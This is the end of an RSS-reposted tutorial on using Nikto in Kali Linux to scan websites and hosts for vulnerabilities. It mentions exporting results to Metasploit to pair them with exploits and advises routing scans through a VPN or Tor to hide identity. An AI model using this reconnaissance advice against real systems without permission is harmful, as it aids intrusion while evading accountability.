<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5147 size-full" src="https://www.ehacking.net/wp-content/uploads/2020/02/Picture11.png" sizes="auto, (max-width: 955px) 100vw, 955px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Picture11.png 955w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture11-300x79.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture11-768x203.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture11-696x184.png 696w" alt="Nikto 9" width="955" height="253"></p>
<p>These are all the hosts that have port 80 on. Run Nikto on targetIP.txt.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5148 size-full" src="https://www.ehacking.net/wp-content/uploads/2020/02/Picture12.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Picture12.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture12-300x205.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture12-768x525.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture12-218x150.png 218w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture12-696x475.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture12-615x420.png 615w" alt="Nikto 10" width="975" height="666"></p>
<p>So far, we have scanned an SSL enabled website and an IP address on a local network, now let’s scan a website using port 80 (HTTP enabled) i.e an unsecured web domain:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5149 size-full" src="https://www.ehacking.net/wp-content/uploads/2020/02/Picture13.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Picture13.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture13-300x124.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture13-768x317.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Picture13-696x288.png 696w" alt="Nikto 11" width="975" height="403"></p>
<p>So, this can tell us it is using Varnish server and some of the headers that would indicate the configuration of website.</p>
<p>The last entries with the OSVDB prefix are those vulnerabilities reported in the&nbsp;<a href="http://www.osvdb.org/">Open Source Vulnerability Database</a>.</p>
<p>you can use the&nbsp;<a href="https://cve.mitre.org/data/refs/refmap/source-OSVDB.html">CVE tool</a>&nbsp;to convert the OSVDB identifier into a CVE entry so that you can use one of the other sites above to learn more about the vulnerability. The CVE contain information about what can be exploited, what the severity score is (such as critical), and some other information that can help accessing an attack vector.</p>
<h2><strong>Advantages of Nikto</strong></h2>
<p>One&nbsp;of&nbsp;the&nbsp;best&nbsp;things&nbsp;about&nbsp;Nikto&nbsp;is&nbsp;that&nbsp;you&nbsp;can&nbsp;actually&nbsp;export&nbsp;information&nbsp;to&nbsp;a&nbsp;format&nbsp;that&nbsp;can&nbsp;be&nbsp;read&nbsp;by&nbsp;Metasploit&nbsp;when&nbsp;you&nbsp;are&nbsp;doing&nbsp;a&nbsp;scan. To&nbsp;do&nbsp;that,&nbsp;just&nbsp;use&nbsp;the&nbsp;above&nbsp;commands&nbsp;to&nbsp;scan,&nbsp;but&nbsp;append&nbsp;-Format&nbsp;msf+&nbsp;to&nbsp;the&nbsp;end. The&nbsp;format&nbsp;will&nbsp;allow&nbsp;us&nbsp;to&nbsp;quickly&nbsp;pair&nbsp;data&nbsp;with&nbsp;a&nbsp;weaponized&nbsp;exploit.</p>
<p>This is all about scanning target website for vulnerabilities from identifying first the attacking surface then further hunting those vulnerabilities which can be used as a weaponized&nbsp;exploit.</p>
<p>As this tool is not stealthy, it is recommended that use this tool with a VPN or through TOR browser to be anonymous and protect your identity.</p>
</div>
<p>The post <a href="http://kostacipo.stream/how-to-use-nikto-for-scanning-vulnerabilities-of-any-website-in-kali-linux/">How to Use Nikto for Scanning Vulnerabilities of Any Website in Kali Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/how-to-use-nikto-for-scanning-vulnerabilities-of-any-website-in-kali-linux/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
